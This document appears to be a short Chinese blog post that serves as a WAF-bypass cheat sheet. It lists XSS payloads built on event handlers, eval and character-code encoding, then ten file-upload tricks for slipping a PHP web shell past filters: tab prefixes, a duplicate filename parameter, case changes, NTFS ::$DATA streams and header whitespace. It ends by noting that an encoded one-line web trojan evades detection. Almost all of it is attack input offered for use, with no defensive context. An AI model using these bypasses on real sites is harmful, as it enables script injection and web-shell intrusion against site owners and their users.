XSS绕过WAF
标签:
<audio src=x onerror=alert(/xss/)>
<body/onfocus=alert(/xss/)>
<details open ontoggle=alert(/xss/)>
<button onfocus=alert(/xss/) autofocus>
函数:
<details open ontoggle=top.alert(1)> (在goole浏览器实用)
<details%20open%20ontoggle=eval(%27alert(1)%27)>
Ascii编码:
<body/onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62)) >
<svg/onload=setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))>
附加一个实验截图
文件上传过waf的方法
1、突破0,文件名前缀加[0x09]绕过:filename="[0x09]whell.php"
2、文件名去掉双引号绕过:filename=whell.php
3、添加一个filename1的文件名参数,并赋值绕过: filename="whell.php";filename1="test.jpg"
4、form变量改成f+orm组合绕过:f+orm-data; name="uploaded"; filename="whell.php"
5、文件名后缀大小写绕过:filename="whell.Php"
6、去掉form-data变量绕过:name="uploaded"; filename="whell.php"
7、在Content-Disposition:后添加多个空格或者在form-data;后添加多个空格绕过:
8、回车换行,绕过:
9、NTFS流 在文件名后加::$DATA绕过:filename="whell.php::$DATA"
10、在文件名前缀加空格(tab键可替换)绕过: filename= "whell.php"
试验贴图
网马过waf
1、正常的一句话木马会被WAF查杀,编码后不会被查杀
网友评论